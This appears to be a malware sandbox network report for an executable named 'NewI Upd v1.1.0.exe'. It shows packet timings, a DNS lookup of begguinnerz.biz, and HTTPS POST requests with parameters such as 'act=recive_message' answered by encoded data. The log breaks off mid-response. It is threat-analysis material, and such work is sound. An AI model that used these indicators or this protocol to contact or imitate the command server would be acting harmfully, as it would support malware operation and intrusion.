Dec 27, 2024 03:03:13.522043943 CET	443	49889	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:13.522125006 CET	49889	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:13.522444010 CET	49889	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:13.522458076 CET	443	49889	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:13.522468090 CET	49889	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:13.522473097 CET	443	49889	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:13.753925085 CET	49895	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:13.753979921 CET	443	49895	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:13.754064083 CET	49895	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:13.754460096 CET	49895	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:13.754478931 CET	443	49895	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:15.056703091 CET	443	49895	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:15.056791067 CET	49895	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:15.060503006 CET	49895	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:15.060508966 CET	443	49895	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:15.060720921 CET	443	49895	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:15.064353943 CET	49895	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:15.064610004 CET	49895	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:15.064631939 CET	443	49895	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:15.065102100 CET	49895	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:15.065108061 CET	443	49895	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:16.071022987 CET	443	49895	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:16.071110010 CET	443	49895	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:16.071176052 CET	49895	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:16.071353912 CET	49895	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:16.071367979 CET	443	49895	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:16.146555901 CET	49902	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:16.146600008 CET	443	49902	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:16.146677017 CET	49902	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:16.146924973 CET	49902	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:16.146936893 CET	443	49902	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:17.384973049 CET	443	49902	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:17.385054111 CET	49902	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:17.386250019 CET	49902	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:17.386256933 CET	443	49902	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:17.386477947 CET	443	49902	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:17.387754917 CET	49902	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:17.387887955 CET	49902	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:17.387914896 CET	443	49902	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:18.155172110 CET	443	49902	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:18.155281067 CET	443	49902	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:18.155395985 CET	49902	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:18.155673981 CET	49902	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:18.155682087 CET	443	49902	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:18.347497940 CET	49907	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:18.347531080 CET	443	49907	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:18.347609043 CET	49907	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:18.347975016 CET	49907	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:18.347990990 CET	443	49907	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:19.610692024 CET	443	49907	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:19.610770941 CET	49907	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:19.612443924 CET	49907	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:19.612458944 CET	443	49907	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:19.612786055 CET	443	49907	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:19.614218950 CET	49907	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:19.614365101 CET	49907	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:19.614403009 CET	443	49907	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:19.614464045 CET	49907	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:19.614474058 CET	443	49907	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:20.580203056 CET	443	49907	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:20.580292940 CET	443	49907	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:20.580353975 CET	49907	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:20.580534935 CET	49907	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:20.580547094 CET	443	49907	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:21.136850119 CET	49914	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:21.136876106 CET	443	49914	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:21.136955976 CET	49914	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:21.137290001 CET	49914	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:21.137300014 CET	443	49914	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:22.349209070 CET	443	49914	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:22.349273920 CET	49914	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:22.351037979 CET	49914	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:22.351043940 CET	443	49914	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:22.351255894 CET	443	49914	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:22.352888107 CET	49914	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:22.353003979 CET	49914	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:22.353007078 CET	443	49914	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:23.080720901 CET	443	49914	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:23.080815077 CET	443	49914	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:23.080925941 CET	49914	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:23.082022905 CET	49914	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:23.082040071 CET	443	49914	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:23.162425041 CET	49920	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:23.162461042 CET	443	49920	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:23.162565947 CET	49920	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:23.162959099 CET	49920	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:23.162966967 CET	443	49920	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:24.432986975 CET	443	49920	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:24.433080912 CET	49920	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:24.434259892 CET	49920	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:24.434268951 CET	443	49920	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:24.434501886 CET	443	49920	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:24.445975065 CET	49920	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:24.446049929 CET	49920	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:24.446054935 CET	443	49920	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:25.852410078 CET	443	49920	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:25.852502108 CET	443	49920	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:25.852610111 CET	49920	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:25.852715969 CET	49920	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:25.852729082 CET	443	49920	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:25.896312952 CET	49926	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:25.896337986 CET	443	49926	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:25.896408081 CET	49926	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:25.896707058 CET	49926	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:25.896719933 CET	443	49926	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:27.179846048 CET	443	49926	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:27.179953098 CET	49926	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:27.180963039 CET	49926	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:27.180969000 CET	443	49926	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:27.181178093 CET	443	49926	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:27.182189941 CET	49926	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:27.182220936 CET	49926	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:27.182260990 CET	443	49926	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:27.935921907 CET	443	49926	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:27.936026096 CET	443	49926	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:27.936085939 CET	49926	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:27.936492920 CET	49926	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:27.936511040 CET	443	49926	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:27.936522961 CET	49926	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:27.936527967 CET	443	49926	172.67.190.223	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 03:03:08.788070917 CET	55378	53	192.168.2.4	1.1.1.1
Dec 27, 2024 03:03:09.097109079 CET	53	55378	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 27, 2024 03:03:08.788070917 CET	192.168.2.4	1.1.1.1	0x76e2	Standard query (0)	begguinnerz.biz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 27, 2024 03:03:09.097109079 CET	1.1.1.1	192.168.2.4	0x76e2	No error (0)	begguinnerz.biz		172.67.190.223	A (IP address)	IN (0x0001)	false
Dec 27, 2024 03:03:09.097109079 CET	1.1.1.1	192.168.2.4	0x76e2	No error (0)	begguinnerz.biz		104.21.92.91	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

begguinnerz.biz

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49883	172.67.190.223	443	6648	C:\Users\user\Desktop\NewI Upd v1.1.0.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 02:03:10 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: begguinnerz.biz
2024-12-27 02:03:10 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-27 02:03:11 UTC	1125	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 02:03:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6bv0a7f8qhc0o389kt96fphl4f; expires=Mon, 21 Apr 2025 19:49:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OkCNyTrh0vYy%2FQzMrKhJHFjYpVXLsirmpcIned%2FvBnJMGS1whZgHXPomcM6tIoit22OOJes2Ai%2BJz2m7Z%2BcWNqlQHqLQYzwFc4UDVGTE7C2lkR0c7edozxV6ErAUhBla2F0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f85bb90194f333c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1856&min_rtt=1819&rtt_var=757&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=906&delivery_rate=1378008&cwnd=229&unsent_bytes=0&cid=8f14dfe795cc451a&ts=785&x=0"
2024-12-27 02:03:11 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-27 02:03:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49889	172.67.190.223	443	6648	C:\Users\user\Desktop\NewI Upd v1.1.0.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 02:03:12 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 86 Host: begguinnerz.biz
2024-12-27 02:03:12 UTC	86	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--3fe7f419a360&j=b9abc76ce53b6fc3a03566f8f764f5ea
2024-12-27 02:03:13 UTC	1133	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 02:03:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tacntpsd5h4846tnr3rcqc5b98; expires=Mon, 21 Apr 2025 19:49:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NW%2BQ4tQ1%2Fyu9vPA8077kIWi%2FPHxMcZmt1c%2Fokck%2BoaMAFL58qp1DenboH1xMiuHLUEvuuf2t52AM2FRPe70wMiDJASZ%2FvUioU%2B6KHft5H7kEmSSj596wsDuF%2BJnQfUpAXZo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f85bb9d0931f795-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1502&min_rtt=1497&rtt_var=571&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=985&delivery_rate=1898569&cwnd=187&unsent_bytes=0&cid=73884a237f26d46f&ts=797&x=0"
2024-12-27 02:03:13 UTC	236	IN	Data Raw: 34 36 61 0d 0a 49 57 68 42 6f 64 4b 55 51 4b 35 59 39 4b 78 58 68 6a 76 6a 4a 79 58 67 59 43 54 78 38 41 77 54 6b 39 55 47 6a 75 32 39 45 63 4a 61 53 6a 65 44 36 4b 42 73 6a 43 75 52 6a 6d 33 67 57 6f 39 55 51 4d 78 43 52 5a 58 53 4e 6e 58 79 75 58 58 72 77 5a 39 6e 72 77 4e 53 4a 38 43 2b 35 79 57 43 65 70 48 55 64 62 78 67 6d 41 56 41 6a 6b 49 65 30 35 56 6d 63 66 4b 35 5a 4f 2b 47 30 6d 47 75 51 67 41 74 78 72 72 78 49 38 6f 35 6d 4d 45 79 34 31 36 43 54 55 75 4a 44 55 79 63 30 69 41 78 39 71 38 6b 74 4d 2f 77 64 4c 5a 41 4a 53 44 53 75 62 59 39 67 69 50 57 79 54 6d 6b 41 63 46 47 51 49 49 4d 51 70 57 62 5a 48 76 37 73 57 58 71 68 38 31 34 70 45 6b 41 49 38 57 37 2b 79 72 65 4e 4a 4c 47 4f 65 56 Data Ascii: 46aIWhBodKUQK5Y9KxXhjvjJyXgYCTx8AwTk9UGju29EcJaSjeD6KBsjCuRjm3gWo9UQMxCRZXSNnXyuXXrwZ9nrwNSJ8C+5yWCepHUdbxgmAVAjkIe05VmcfK5ZO+G0mGuQgAtxrrxI8o5mMEy416CTUuJDUyc0iAx9q8ktM/wdLZAJSDSubY9giPWyTmkAcFGQIIMQpWbZHv7sWXqh814pEkAI8W7+yreNJLGOeV
2024-12-27 02:03:13 UTC	901	IN	Data Raw: 55 67 67 55 4a 77 67 56 65 30 38 6f 75 49 73 4f 30 64 66 32 61 30 6d 4f 6d 41 78 56 74 32 76 44 78 4c 6f 78 69 31 73 59 35 36 6c 79 43 53 6b 43 44 41 6c 53 63 6b 6d 31 35 2b 62 4e 75 34 34 44 51 66 61 70 45 41 69 72 45 76 2f 45 71 79 6a 57 56 6a 6e 75 6b 58 70 6b 46 48 38 49 69 56 70 43 52 65 6e 7a 67 39 33 75 69 6c 70 39 30 72 41 4e 53 59 38 57 2b 39 79 2f 4d 4b 4a 37 46 50 75 46 4c 69 6b 78 4b 6a 77 4a 4c 6d 5a 31 74 63 66 61 39 62 75 4f 46 32 33 36 74 52 51 6f 6a 67 2f 36 32 4a 64 52 36 7a 6f 34 57 34 55 6d 47 53 56 48 41 4f 41 61 4d 33 48 63 78 39 72 73 6b 74 4d 2f 58 64 71 4e 41 41 53 7a 41 75 50 30 77 7a 43 69 51 77 7a 44 32 58 34 52 4c 54 59 45 51 54 4a 32 55 62 58 6a 36 76 6d 48 72 69 35 38 39 34 45 51 53 59 35 76 77 31 79 2f 48 4e 70 7a 5a 4e 61 Data Ascii: UggUJwgVe08ouIsO0df2a0mOmAxVt2vDxLoxi1sY56lyCSkCDAlSckm15+bNu44DQfapEAirEv/EqyjWVjnukXpkFH8IiVpCRenzg93uilp90rANSY8W+9y/MKJ7FPuFLikxKjwJLmZ1tcfa9buOF236tRQojg/62JdR6zo4W4UmGSVHAOAaM3Hcx9rsktM/XdqNAASzAuP0wzCiQwzD2X4RLTYEQTJ2UbXj6vmHri5894EQSY5vw1y/HNpzZNa
2024-12-27 02:03:13 UTC	1369	IN	Data Raw: 33 65 61 32 0d 0a 42 45 6a 41 78 42 68 64 4a 78 50 2b 6a 33 59 2b 44 50 68 7a 4f 75 54 67 45 76 78 4c 6e 33 49 63 77 77 6d 4d 45 2f 37 46 47 42 53 45 61 4a 43 6b 43 65 6d 57 46 2b 39 72 39 6e 34 49 72 53 63 4f 41 4e 53 69 54 62 38 4b 35 69 36 54 53 56 33 79 53 6d 62 49 4a 4c 53 59 55 55 42 6f 7a 63 64 7a 48 32 75 79 53 30 7a 39 56 30 70 30 63 48 4b 63 43 30 38 69 2f 44 4d 35 2f 48 4a 2b 35 56 6a 31 64 4b 69 41 64 49 6e 35 64 68 63 66 43 32 61 75 61 45 6e 7a 33 67 52 42 4a 6a 6d 2f 44 5a 4c 39 77 6f 6e 4d 55 6b 70 6d 79 43 53 30 6d 46 46 41 61 4d 33 48 63 78 39 72 73 6b 74 4d 2f 55 64 61 78 50 43 69 58 52 76 76 6b 77 78 69 69 53 77 44 48 6f 56 34 68 49 53 49 63 51 51 70 4f 41 62 33 54 32 75 57 6e 2b 69 70 38 39 34 45 51 53 59 35 76 77 7a 42 62 4c 4b 6f 66 Data Ascii: 3ea2BEjAxBhdJxP+j3Y+DPhzOuTgEvxLn3IcwwmME/7FGBSEaJCkCemWF+9r9n4IrScOANSiTb8K5i6TSV3ySmbIJLSYUUBozcdzH2uyS0z9V0p0cHKcC08i/DM5/HJ+5Vj1dKiAdIn5dhcfC2auaEnz3gRBJjm/DZL9wonMUkpmyCS0mFFAaM3Hcx9rsktM/UdaxPCiXRvvkwxiiSwDHoV4hISIcQQpOAb3T2uWn+ip894EQSY5vwzBbLKof
2024-12-27 02:03:13 UTC	1369	IN	Data Raw: 59 46 47 56 6f 56 43 43 4e 4f 63 61 48 47 78 37 33 4c 38 6d 4e 68 73 37 6c 70 4b 4a 4d 2f 77 72 6d 4c 47 4b 4a 50 41 4d 65 35 63 68 55 6c 4e 67 67 64 55 6d 35 52 70 66 66 6d 79 61 2b 71 4b 30 6e 53 72 51 42 67 78 77 4c 54 34 4c 6f 78 30 31 73 6b 74 70 41 48 42 59 46 43 42 45 6b 43 51 30 6e 45 2f 36 50 64 6a 34 4d 2b 48 4d 36 42 4e 42 69 6a 45 75 2f 30 6d 79 44 71 62 78 54 76 71 55 49 31 4e 53 34 55 51 53 35 61 61 5a 48 6a 30 75 32 6e 76 6e 64 78 79 34 41 31 4b 4a 4e 76 77 72 6d 4c 72 43 61 48 74 64 66 73 58 6d 41 56 41 6a 6b 49 65 30 35 4e 6d 64 76 2b 7a 64 75 4b 64 30 58 53 67 52 51 49 72 78 4c 7a 34 4c 4e 34 79 6c 38 34 37 36 31 47 49 51 55 61 47 42 6b 71 55 30 69 41 78 39 71 38 6b 74 4d 2f 33 63 4c 70 5a 53 41 33 49 73 50 45 79 32 69 48 57 30 58 76 39 Data Ascii: YFGVoVCCNOcaHGx73L8mNhs7lpKJM/wrmLGKJPAMe5chUlNggdUm5Rpffmya+qK0nSrQBgxwLT4Lox01sktpAHBYFCBEkCQ0nE/6Pdj4M+HM6BNBijEu/0myDqbxTvqUI1NS4UQS5aaZHj0u2nvndxy4A1KJNvwrmLrCaHtdfsXmAVAjkIe05Nmdv+zduKd0XSgRQIrxLz4LN4yl84761GIQUaGBkqU0iAx9q8ktM/3cLpZSA3IsPEy2iHW0Xv9
2024-12-27 02:03:13 UTC	1369	IN	Data Raw: 65 64 54 46 2f 54 6c 57 49 78 71 66 64 70 2f 6f 37 61 59 61 52 4d 41 54 48 49 74 76 59 6e 33 6a 32 61 78 44 72 6e 55 59 78 47 54 35 41 43 53 35 4f 41 66 48 66 36 75 53 53 69 7a 39 68 72 34 42 74 4b 45 74 53 37 74 6a 32 43 49 39 62 4a 4f 61 51 42 77 55 5a 4e 6a 77 78 55 6c 35 52 6c 63 76 2b 2f 59 65 53 4c 31 58 36 76 53 41 41 71 79 37 44 35 4a 38 51 78 6b 4d 41 30 34 6c 57 4d 42 51 6e 43 42 56 37 54 79 69 35 57 36 37 70 69 2b 35 37 71 64 4b 41 53 53 6a 79 4e 71 62 59 6c 77 48 72 4f 6a 6a 6a 6f 55 34 78 41 51 34 6f 46 52 5a 4b 65 61 6e 7a 38 73 32 33 6f 69 73 31 68 70 6b 30 4b 4c 4d 32 2f 2b 6a 44 43 50 35 62 43 64 61 6f 5a 68 6c 30 48 32 6b 4a 33 68 4a 49 75 62 72 2b 75 4a 4f 75 44 6e 79 76 67 54 41 63 78 7a 37 2f 32 49 38 38 2b 6e 63 6b 7a 34 6c 69 43 51 Data Ascii: edTF/TlWIxqfdp/o7aYaRMATHItvYn3j2axDrnUYxGT5ACS5OAfHf6uSSiz9hr4BtKEtS7tj2CI9bJOaQBwUZNjwxUl5Rlcv+/YeSL1X6vSAAqy7D5J8QxkMA04lWMBQnCBV7Tyi5W67pi+57qdKASSjyNqbYlwHrOjjjoU4xAQ4oFRZKeanz8s23ois1hpk0KLM2/+jDCP5bCdaoZhl0H2kJ3hJIubr+uJOuDnyvgTAcxz7/2I88+nckz4liCQ
2024-12-27 02:03:13 UTC	1369	IN	Data Raw: 4b 30 38 6f 75 65 76 6d 34 64 75 6d 47 31 33 65 70 51 77 34 70 7a 72 66 32 4a 38 45 2f 6b 73 41 78 34 31 6d 4e 53 6b 43 4b 44 55 4b 54 6e 53 34 2f 73 62 42 38 72 4e 65 66 55 36 74 56 4b 79 33 49 6f 72 59 39 67 69 50 57 79 54 6d 6b 41 63 46 4c 54 6f 4d 4b 53 4a 2b 61 61 6d 50 78 76 47 33 6a 6a 74 42 7a 6f 30 49 41 4b 39 47 32 39 69 6e 45 50 5a 37 4b 4f 2f 5a 59 6a 67 55 4a 77 67 56 65 30 38 6f 75 51 4f 65 77 59 2b 50 4e 39 6e 53 37 51 67 41 67 79 4c 79 32 50 59 49 6a 31 73 6b 35 70 41 48 42 53 45 75 50 42 6c 53 66 6b 6d 35 34 39 72 31 32 34 34 44 53 63 4b 42 47 47 43 4c 52 76 2f 30 6e 7a 7a 36 5a 77 54 6e 73 55 38 45 4c 42 34 55 61 42 73 76 53 51 6e 4c 67 76 53 62 4c 6c 63 6c 30 72 46 49 42 4c 73 2f 77 36 57 7a 56 65 70 48 43 64 62 77 5a 67 55 52 4b 6b 41 Data Ascii: K08ouevm4dumG13epQw4pzrf2J8E/ksAx41mNSkCKDUKTnS4/sbB8rNefU6tVKy3IorY9giPWyTmkAcFLToMKSJ+aamPxvG3jjtBzo0IAK9G29inEPZ7KO/ZYjgUJwgVe08ouQOewY+PN9nS7QgAgyLy2PYIj1sk5pAHBSEuPBlSfkm549r1244DScKBGGCLRv/0nzz6ZwTnsU8ELB4UaBsvSQnLgvSbLlcl0rFIBLs/w6WzVepHCdbwZgURKkA
2024-12-27 02:03:13 UTC	1369	IN	Data Raw: 49 44 48 67 73 48 57 73 31 38 6c 6a 74 30 51 56 62 64 72 77 38 53 36 4d 59 74 62 46 4f 75 70 55 69 6b 46 4f 68 77 70 46 6c 70 64 6b 66 66 32 32 62 4f 57 46 32 6e 61 6d 53 51 6b 74 7a 4c 48 36 4a 73 55 30 6e 34 35 37 70 46 36 5a 42 52 2f 43 4e 46 61 55 69 6d 4e 68 73 34 56 6e 2f 5a 37 4b 66 72 42 46 53 41 7a 41 76 50 55 6e 79 79 72 57 30 58 76 39 47 59 5a 4a 42 39 70 43 52 70 65 65 62 58 62 2f 75 47 6e 6a 69 4e 52 38 71 6b 30 59 4c 4d 61 34 2b 69 72 42 4b 4a 7a 45 4a 2b 31 51 6a 45 74 50 6b 41 45 47 33 64 4a 70 61 62 48 76 4a 4e 36 46 33 48 2b 32 54 67 56 6a 33 50 37 76 59 73 73 32 31 70 5a 31 39 6b 75 42 54 6b 65 46 44 46 53 53 6d 6d 46 37 38 62 46 76 35 6f 7a 57 64 36 35 4b 44 43 4c 4f 73 66 63 69 79 54 71 66 33 44 69 6b 46 38 46 43 58 38 4a 61 42 71 53 Data Ascii: IDHgsHWs18ljt0QVbdrw8S6MYtbFOupUikFOhwpFlpdkff22bOWF2namSQktzLH6JsU0n457pF6ZBR/CNFaUimNhs4Vn/Z7KfrBFSAzAvPUnyyrW0Xv9GYZJB9pCRpeebXb/uGnjiNR8qk0YLMa4+irBKJzEJ+1QjEtPkAEG3dJpabHvJN6F3H+2TgVj3P7vYss21pZ19kuBTkeFDFSSmmF78bFv5ozWd65KDCLOsfciyTqf3DikF8FCX8JaBqS
2024-12-27 02:03:13 UTC	1369	IN	Data Raw: 65 38 30 6f 73 2f 62 59 75 41 62 57 6e 47 59 35 61 56 31 6e 47 69 4a 67 43 79 6b 54 38 45 64 46 63 78 43 56 4e 50 4b 4c 6a 62 79 70 58 62 71 6a 4d 6c 77 35 33 30 30 41 38 69 38 39 53 37 4e 50 64 61 41 64 65 73 5a 32 58 77 48 67 52 42 55 33 49 4e 34 66 4f 47 77 4b 4f 53 65 30 6e 2f 67 44 55 70 76 78 37 76 36 4a 38 73 71 32 64 77 6c 37 31 57 58 43 55 4f 51 51 67 6a 54 67 32 56 2b 34 37 6c 6a 6f 35 37 4a 66 72 42 41 44 79 53 50 75 4f 63 76 77 48 72 59 6a 69 44 76 56 59 64 49 55 73 30 54 55 4a 43 45 61 54 33 35 70 6d 6e 67 7a 2b 41 39 34 46 74 4b 65 34 4f 46 39 53 7a 43 50 59 44 66 65 4d 52 53 6a 55 5a 4c 67 77 55 47 33 64 4a 6f 4d 61 6e 6b 4b 71 79 4c 7a 6a 50 34 45 31 68 34 6c 75 4f 68 63 70 34 6c 32 4e 64 31 38 68 6e 5a 46 77 6e 43 45 41 62 4c 30 69 6c 79 Data Ascii: 